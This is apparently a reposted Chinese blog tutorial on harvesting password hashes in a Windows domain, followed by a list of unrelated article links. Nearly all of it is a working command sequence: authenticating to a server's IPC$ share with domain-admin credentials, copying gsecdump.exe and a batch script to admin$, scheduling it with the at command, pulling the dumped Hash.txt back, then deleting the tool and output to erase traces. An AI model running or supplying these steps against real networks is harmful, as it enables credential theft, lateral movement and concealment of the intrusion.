使用at命令+gsecdump在域环境下抓Hash-白红宇

使用at命令+gsecdump在域环境下抓Hash

阅读量：4613 次

发布时间：2019-06-09

本文共 682 字，大约阅读时间需要 2 分钟。

使用域管理员帐号ipc到某台服务器

net use \\IP地址\ipc$ "密码" /user:"域管理员@当前域名称"

将本机的gsecdump.exe拷贝至对方的C:\WINDOWS目录下

copy gsecdump.exe \\IP地址\admin$

将本机的run.bat拷贝至对方的C:\WINDOWS目录下

copy run.bat \\IP地址\admin$

run.bat内容如下: C:\WINDOWS\gsecdump.exe -u -s>C:\WINDOWS\Hash.txt

查看目标服务器当前时间

net time \\IP地址

添加计划任务

at \\IP地址 xx:xx “run.bat”

设定时间过后查看Hash.txt文件是否成功生成

dir \\IP地址\admin$\Hash.txt

本机使用批处理文件获取Hash内容 fetch.bat

fetch.bat内容如下:

type \\IP地址\admin$\Hash.txt>Domain_Hash.txt

删除目标服务器C:\WINDOWS目录下的gsecdump.exe

del \\IP地址\admin$\gsecdump.exe

删除目标服务器C:\WINDOWS目录下的run.bat

del \\IP地址\admin$\run.bat

删除目标服务器C:\WINDOWS目录下的Hash.txt

del \\IP地址\admin$\Hash.txt

转载于:https://www.cnblogs.com/mujj/articles/3916796.html

你可能感兴趣的文章

TCP与UDP的异同（服务端接收数据，客户端发送数据）

查看>>

OkHttp 官方wiki 使用案例 MD

MVVM(Model-View-View-Model)简单分析（及代码示例）

查看>>

Mac 下 android／iOS https抓包

uva - 10071 Back to High School Physics 解题报告

查看>>

“Project 'MyFunProject' is not a J2SE 5.0 compliant project.”

查看>>

python操作mysql（4）--增删改查

查看>>

python的函数功能

查看>>

AttributeError: 'str' object has no attribute 'copy'

查看>>

给树莓派开启samba服务

查看>>

linux find命令中-print0和xargs中-0的用法

查看>>

3dContactPointAnnotationTool开发日志（二六）

查看>>

POJ 2584 T-Shirt Gumbo (二分图多重最大匹配)

查看>>